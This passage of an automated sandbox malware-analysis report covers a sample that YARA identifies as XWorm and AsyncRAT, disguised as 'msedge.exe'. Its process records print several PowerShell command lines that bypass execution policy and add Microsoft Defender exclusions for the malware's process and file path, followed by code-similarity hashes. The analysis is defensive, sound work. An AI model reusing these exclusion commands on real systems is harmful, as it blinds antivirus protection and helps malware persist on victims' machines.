                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:16:10:11
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:16:10:11
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:16:10:19
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:16:10:19
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:16:10:33
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:16:10:33
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:16:11:03
                                                                        Start date:15/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\msedge.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\msedge.exe"
                                                                        Imagebase:0x720000
                                                                        File size:192'512 bytes
                                                                        MD5 hash:E796B778B392F06DE4D340EC0F88B4CC
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 74%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:16:11:12
                                                                        Start date:15/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\msedge.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\msedge.exe"
                                                                        Imagebase:0xdf0000
                                                                        File size:192'512 bytes
                                                                        MD5 hash:E796B778B392F06DE4D340EC0F88B4CC
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:24.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:3
                                                                          Total number of Limit Nodes:0

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_L$W_H$SAL_^
                                                                          • API String ID: 0-3586993791
                                                                          • Opcode ID: 9ec3190844f5ef43d089a4b08b6955f65fc1575f87ceae8c7a2cb31e8f9df2ef
                                                                          • Instruction ID: 4ae45db7abf7c56354efdc510c38462e5e4a7588a876e52356281c0b1ac697eb
                                                                          • Opcode Fuzzy Hash: 9ec3190844f5ef43d089a4b08b6955f65fc1575f87ceae8c7a2cb31e8f9df2ef
                                                                          • Instruction Fuzzy Hash: 8EF1A130A2DA595FEB98FB3884797B976D2FF98750F40057AE40ED32C2DE28AC418745

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cbe67d10bde0e178aec13def3ec34b00011f2202cd56086646fc073a0eb20c50
                                                                          • Instruction ID: 57e87190870a57f7e4adb766968852d300f3dea77e37a2f1c7b3b654da362ea4
                                                                          • Opcode Fuzzy Hash: cbe67d10bde0e178aec13def3ec34b00011f2202cd56086646fc073a0eb20c50
                                                                          • Instruction Fuzzy Hash: 10F1C43090CA8D8FEBA8EF28C8557E977E1FF64340F14426EE84DC7291DB7499448B82

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cc181880b29541b935a256b694deb7bf3f83a29583f003361baf82acb0e13f8
                                                                          • Instruction ID: 4da50a9eff0b9e694f6ae4ce582684a61a8e4904bfe90793edc2deb0fb7ac655
                                                                          • Opcode Fuzzy Hash: 0cc181880b29541b935a256b694deb7bf3f83a29583f003361baf82acb0e13f8
                                                                          • Instruction Fuzzy Hash: 25E1C23091CA4E8FEBA8EF28C8557E977D1FF64750F54426ED84DC7291DB78A8408B81

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: c78b5f63b98c30da9809f5112298c5e1052bf263f6c0a2da1c147f059f5d7269
                                                                          • Instruction ID: 9e9ae7cc7a1918359ae20a87bdca457ce27f3911e7901937b7932f4cddde5818
                                                                          • Opcode Fuzzy Hash: c78b5f63b98c30da9809f5112298c5e1052bf263f6c0a2da1c147f059f5d7269
                                                                          • Instruction Fuzzy Hash: 0241C23180C6588FD719DF98D849BE9BBF0FF56311F04416EE08AD3692CB786846CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B"I$(B"I$(B"I$(B"I$(B"I$X7E
                                                                          • API String ID: 0-1854128441
                                                                          • Opcode ID: e3c82ee329dc31f34d1d8ccaa447df9890307c8d4e652d40bf09526bd5cf6544
                                                                          • Instruction ID: e3ec5c9461b907a6b5f37704eb632135b4b92a3738c520dca5391de68af9b274
                                                                          • Opcode Fuzzy Hash: e3c82ee329dc31f34d1d8ccaa447df9890307c8d4e652d40bf09526bd5cf6544
                                                                          • Instruction Fuzzy Hash: 0DC1FE31D1EA8E5FEB94EB2858595B9BBA1EF15394F1401BAD40DC70D3EA2CA801C355
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (7E$B$p>"I$p>"I
                                                                          • API String ID: 0-3162089516
                                                                          • Opcode ID: fa275727d904eee3b7255422af79680a2c15642cc9447bdb7f45cf1435ad29c4
                                                                          • Instruction ID: 9c7971da7781aef2a4a564eb729f928f36f251e0352a07c4534dc95f72a98bd8
                                                                          • Opcode Fuzzy Hash: fa275727d904eee3b7255422af79680a2c15642cc9447bdb7f45cf1435ad29c4
                                                                          • Instruction Fuzzy Hash: 0A911431E0EA894FE796EB2858191B47BE0EF66660F0901FFD049C75D3DB1CAC168396
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>"I
                                                                          • API String ID: 0-2459728092
                                                                          • Opcode ID: 8a34fb98cdc05aec38f64929da3299198f06f0db5d19c52c59bbbbfb17638b11
                                                                          • Instruction ID: e9b3853bcf23ff748969a0ceb1b5332b73edc3bffd9410ce56f65c8bf0464563
                                                                          • Opcode Fuzzy Hash: 8a34fb98cdc05aec38f64929da3299198f06f0db5d19c52c59bbbbfb17638b11
                                                                          • Instruction Fuzzy Hash: A051B132A0DE864FEB9AAB2C941167577E1EFA5260F1801BEC11EC71D2DF1CE805825A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>"I
                                                                          • API String ID: 0-2459728092
                                                                          • Opcode ID: de2a4410d9d6aff9546a3863bc3aa53cdb9ebfaba37fa893d51a0ee7ebc018d1
                                                                          • Instruction ID: 3b12429f685c495853145ec733d02081d089ca37deed87f690604cbf95127c10
                                                                          • Opcode Fuzzy Hash: de2a4410d9d6aff9546a3863bc3aa53cdb9ebfaba37fa893d51a0ee7ebc018d1
                                                                          • Instruction Fuzzy Hash: 59218E32D0EE864FEBAAEB28945117566D1FF74290F5901BEC11EC71E2CF1CDC04864A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B"I
                                                                          • API String ID: 0-2674835063
                                                                          • Opcode ID: 5cf6c3fd92cdb352a9a8cfc59e7d24288a2856d68728887574bbddc1bc5918cb
                                                                          • Instruction ID: 5b66cf6c4bf521268eb284258d9076fd6f38b3405dd2e5ab5fa9dde87fca774c
                                                                          • Opcode Fuzzy Hash: 5cf6c3fd92cdb352a9a8cfc59e7d24288a2856d68728887574bbddc1bc5918cb
                                                                          • Instruction Fuzzy Hash: EC11BF71E0EA8A9FE795EF589494278B7E1EF18361F2401BEC14CD71C2EA2CA845C354
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>"I
                                                                          • API String ID: 0-3426486286
                                                                          • Opcode ID: 1880f959c75b80cb59d2c4bd57169871f2e3631d25ccbfc923268a8fa191def8
                                                                          • Instruction ID: 98a3149b7e0d8eefe461cc7aeebf2b3e123239796a4201cc5868a1f00e85d53b
                                                                          • Opcode Fuzzy Hash: 1880f959c75b80cb59d2c4bd57169871f2e3631d25ccbfc923268a8fa191def8
                                                                          • Instruction Fuzzy Hash: A311CE32E0ED864FEBA4EB28A4505B877E1FF64760F4900BAD41DC75E6DB1CAC148396
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae1afb398f5e0a0d55d2e51ec982b0df254dcdf3e7d0420a8e59747e38e23551
                                                                          • Instruction ID: 3924c7a769c6f6a323f6179a4d90a80c155f4d5222e6ee5b8c173c07f0c3bd3a
                                                                          • Opcode Fuzzy Hash: ae1afb398f5e0a0d55d2e51ec982b0df254dcdf3e7d0420a8e59747e38e23551
                                                                          • Instruction Fuzzy Hash: 09813C33D0D9925FE316BB7CA8660E577A0FF11BA9F0801B6C48C8E0D3EE185C568799
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f86e8ee523d8b8d855e729992015ff41176bbf48da720fa40deabf0a9e68902f
                                                                          • Instruction ID: 310696b3949a58febec5be80fe1a3a96cc51f548f3d3eeca1649f523cb213c6e
                                                                          • Opcode Fuzzy Hash: f86e8ee523d8b8d855e729992015ff41176bbf48da720fa40deabf0a9e68902f
                                                                          • Instruction Fuzzy Hash: C131F63191CB488FDB1C9F5CA8066B97BE1FB99710F00422FE449D3692CB64A856CBC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144588134.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848dfd000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8239f779623cfeaa728e8f28e333060d83943e42eb6659bf3730689715442e51
                                                                          • Instruction ID: 2bc74489960aedaf038f194b86420344a6c4455d93443044e7527f03a23d151b
                                                                          • Opcode Fuzzy Hash: 8239f779623cfeaa728e8f28e333060d83943e42eb6659bf3730689715442e51
                                                                          • Instruction Fuzzy Hash: 4141287180EBC44FE7569B389845A523FF0EF56360F1505DFE088CF1A3D625A84AC7A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7dd4a85cfa7b9921c8c291c9c6a22a3f08625701ec0facd56845cb7fe72d226a
                                                                          • Instruction ID: 5b8b3ee82c3ca9e3619e88e8d86c5f33dc66a5c1480d88ec3239f9f93954686a
                                                                          • Opcode Fuzzy Hash: 7dd4a85cfa7b9921c8c291c9c6a22a3f08625701ec0facd56845cb7fe72d226a
                                                                          • Instruction Fuzzy Hash: 28212B3090C74C8FDB59DB6C984A7E97FF0EB96320F04426FD048C3196D6749856CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^4$N_^7$N_^F$N_^J
                                                                          • API String ID: 0-3508309026
                                                                          • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                          • Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
                                                                          • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                          • Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                          • API String ID: 0-3685135179
                                                                          • Opcode ID: f77356c9369f9636f3e9fca4f8c1399b969ac87a7b996e36827b35710925462a
                                                                          • Instruction ID: 253583669a614aa0ea03074e5a95689f315858f9a36a942faf36b4d5d8d4029c
                                                                          • Opcode Fuzzy Hash: f77356c9369f9636f3e9fca4f8c1399b969ac87a7b996e36827b35710925462a
                                                                          • Instruction Fuzzy Hash: C0C12331D0EACA5FEBA9EF2868156B57BE2FF15354F0402FAD40CD7093EA18E8018351
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B$I$(B$I$(B$I$(B$I
                                                                          • API String ID: 0-2819540369
                                                                          • Opcode ID: 7ed70a4c73848386467aeb848f3967bad16a3d3ffec1bd2dc78c4130876564c7
                                                                          • Instruction ID: f843f279997a225aa9df6b4de001d210d0510e5d9f1ae44bcab1aa7ae5a5b67c
                                                                          • Opcode Fuzzy Hash: 7ed70a4c73848386467aeb848f3967bad16a3d3ffec1bd2dc78c4130876564c7
                                                                          • Instruction Fuzzy Hash: BB71E132D1EAC64FEBA9EF2864552347AE2EF15754F0802FAC44CEB183EA19EC458341
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>$I
                                                                          • API String ID: 0-3301367642
                                                                          • Opcode ID: d91a0bcffdb92587be70c2d2802926d029be0ed3c71f0b2d39feeaaa3007b0e7
                                                                          • Instruction ID: 7260aea0d0d224c4cdac46254b432b1b3c74be00483c77076e0334f37b9a1efd
                                                                          • Opcode Fuzzy Hash: d91a0bcffdb92587be70c2d2802926d029be0ed3c71f0b2d39feeaaa3007b0e7
                                                                          • Instruction Fuzzy Hash: 7051F832E0DA864FEBA9EE2C64116B577E2EF55250F5801FAC00EC7193FE28EC158355
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>$I
                                                                          • API String ID: 0-2590420872
                                                                          • Opcode ID: a6cf8fe11d28ed46430500d694c5989996d75c23bcd71aca2c02770a3d491072
                                                                          • Instruction ID: 0584b4b0e5e9d2e1e96a1bddd725563722f0022b14499621d692300ff5db2a0f
                                                                          • Opcode Fuzzy Hash: a6cf8fe11d28ed46430500d694c5989996d75c23bcd71aca2c02770a3d491072
                                                                          • Instruction Fuzzy Hash: FB41E332E0DA894FEBA9EE2874116B577E1EF85760B0901FAC149C7193FA18EC158395
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>$I
                                                                          • API String ID: 0-3301367642
                                                                          • Opcode ID: 9781e0394f51bb5107959d54af4f522b9d2d6c433b47bb64028f8f51a2e21079
                                                                          • Instruction ID: 5879b468d04db35347dc145dc30549b5b6a5e097a8c7e4da56696f3187d8fee3
                                                                          • Opcode Fuzzy Hash: 9781e0394f51bb5107959d54af4f522b9d2d6c433b47bb64028f8f51a2e21079
                                                                          • Instruction Fuzzy Hash: 4A218032D0E9C74FEBB9EE1864511B576D1EF64290B5905FAC01EC71E3FE28DC548249
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>$I
                                                                          • API String ID: 0-2590420872
                                                                          • Opcode ID: 6b6fe11167621ac9cf85c359b2e612ebf097b7484c7647e3b0cdac3fb945fd89
                                                                          • Instruction ID: 540d444f10a144545ec63ddf014a6cb856b6152d768c689beac6378e7be73025
                                                                          • Opcode Fuzzy Hash: 6b6fe11167621ac9cf85c359b2e612ebf097b7484c7647e3b0cdac3fb945fd89
                                                                          • Instruction Fuzzy Hash: 47119A32E0E9C64FEBA8EE28A4505B877E0EF54260B4910FAD11DC71A3FA18EC148355
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7497d14700e25125830798e1d9991df59861dcab24f9e7599af20661fd653005
                                                                          • Instruction ID: 7f9ec6b1b0d6e6108e261254135d4b58570a662e1c877cbce39b50e2a1f31428
                                                                          • Opcode Fuzzy Hash: 7497d14700e25125830798e1d9991df59861dcab24f9e7599af20661fd653005
                                                                          • Instruction Fuzzy Hash: B851453190DB854FE70AEB28D8954A4BBE0FF16358B1801BFD489CB1D3EE16A847C716
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55235306a55f9d4665ab2105ba2f19f2c44d8f08ed806e43a03e11a01132721c
                                                                          • Instruction ID: 4df5ffc55489d78c0ba60ea8e316d104de4388140b2c64c4f5bd626dc45db611
                                                                          • Opcode Fuzzy Hash: 55235306a55f9d4665ab2105ba2f19f2c44d8f08ed806e43a03e11a01132721c
                                                                          • Instruction Fuzzy Hash: 39311A3191CB888FDB19DF1CAC066A97BF0FB96310F00426FE449C3692CA75A855CBC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2228309292.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848e1d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6986538435dd7e8210cfc12c8f831aa6ed8abd6e6de9be7843165745162471d1
                                                                          • Instruction ID: dc08edb235b941e05a7f630abece9344cbc02606070c1eaddc0c46cf8439e1ed
                                                                          • Opcode Fuzzy Hash: 6986538435dd7e8210cfc12c8f831aa6ed8abd6e6de9be7843165745162471d1
                                                                          • Instruction Fuzzy Hash: 3D41E37180DBC54FE7969B2998419523FF0FF57360F1505EFE088CB1A3DA25A84AC7A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 229d44915abca2dabb1a969efe493c0ac76e2a60ebde8ff056b0bcfd4fec1b2a
                                                                          • Instruction ID: cdff9c2595ac00d36f75440630f1f72145b45c48874825746e9a76b2aa7110c7
                                                                          • Opcode Fuzzy Hash: 229d44915abca2dabb1a969efe493c0ac76e2a60ebde8ff056b0bcfd4fec1b2a
                                                                          • Instruction Fuzzy Hash: CB31277180EBC84FE716CB685C496B97FE4DF13220F0841EFD085CB0A3D669584AC761
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
